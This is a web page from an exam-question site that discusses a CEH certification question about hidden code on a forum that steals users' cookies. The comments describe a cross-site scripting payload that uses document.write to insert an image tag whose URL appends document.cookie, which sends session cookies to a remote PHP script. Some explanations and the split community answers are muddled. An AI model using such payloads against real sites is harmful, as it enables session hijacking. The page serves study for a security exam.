ExamTopics Logo
Mail Us[email protected]
Menu
Eccouncil Discussions
exam questions

Exam 312-50v12 All Questions

View all questions & answers for the 312-50v12 exam
Go to Exam

Exam 312-50v12 topic 1 question 76 discussion

Actual exam question from ECCouncil's 312-50v12
Question #: 76
Topic #: 1
[All 312-50v12 Questions]

Judy created a forum. One day, she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who discovers that the following code is hidden behind those images:

What issue occurred for the users who clicked on the image?

  • A. This php file silently executes the code and grabs the user’s session cookie and session ID.
  • B. The code redirects the user to another site.
  • C. The code injects a new cookie to the browser.
  • D. The code is a virus that is attempting to gather the user’s username and password.
Show Suggested Answer Hide Answer
Suggested Answer: A 🗳️
by eli117 at April 4, 2023, 8:20 p.m.

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
Submit Cancel
g_man_rap
Highly Voted 5 months, 1 week ago
document.write: This JavaScript function writes a string of text to the document as HTML. <img src="..."/>: This HTML tag defines an image element. The src attribute normally points to the URL of the image to display. "https://localhost/submitcookie.php?cookie=": This part of the src attribute is setting the path to a PHP file on the server running on localhost. The query string ?cookie= is used to pass data to the PHP file via a GET request. + escape(document.cookie): This JavaScript code appends the current document's cookies to the URL as part of the query string. The escape function is used to encode the cookies so that special characters are converted to a URL-encoded notation. This is necessary because cookies can contain characters that are not valid in URLs.
upvoted 5 times
...
insaniunt
Most Recent 9 months, 1 week ago
Selected Answer: A
A. This php file silently executes the code and grabs the user’s session cookie and session ID. This script is used to steal cookies. It writes an image element into the HTML document, but the “src” attribute of the image is set to a malicious URL that includes the victim's cookies as part of the URL. When this URL is requested to load the image, it sends cookies to a server controlled by an attacker.
upvoted 1 times
...
Vincent_Lu
1 year, 3 months ago
A. This php file silently executes the code and grabs the user’s session cookie and session ID.
upvoted 1 times
kapen
1 year, 2 months ago
Would be nice if you could explain more the details of the script, I could not figure out the , 'user session cookie' & 'session ID' part in the script. Does the cookie provides both?
upvoted 1 times
...
...
eli117
1 year, 6 months ago
Selected Answer: A
A. This PHP file silently executes the code and grabs the user’s session cookie and session ID. Explanation: The code embedded behind the strange images posted by the user on the forum is a PHP file that runs in the background and steals the user's session cookies and session ID. The PHP script silently executes in the background, and the user may not be aware that their session has been compromised.
upvoted 2 times
kapen
1 year, 2 months ago
Would be nice if you could explain more the details of the script, I could not figure out the , 'user session cookie' & 'session ID' part in the script. Does the cookie provides both?
upvoted 1 times
...
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel
exam
Someone Bought Contributor Access for:
SY0-701
London, 1 minute ago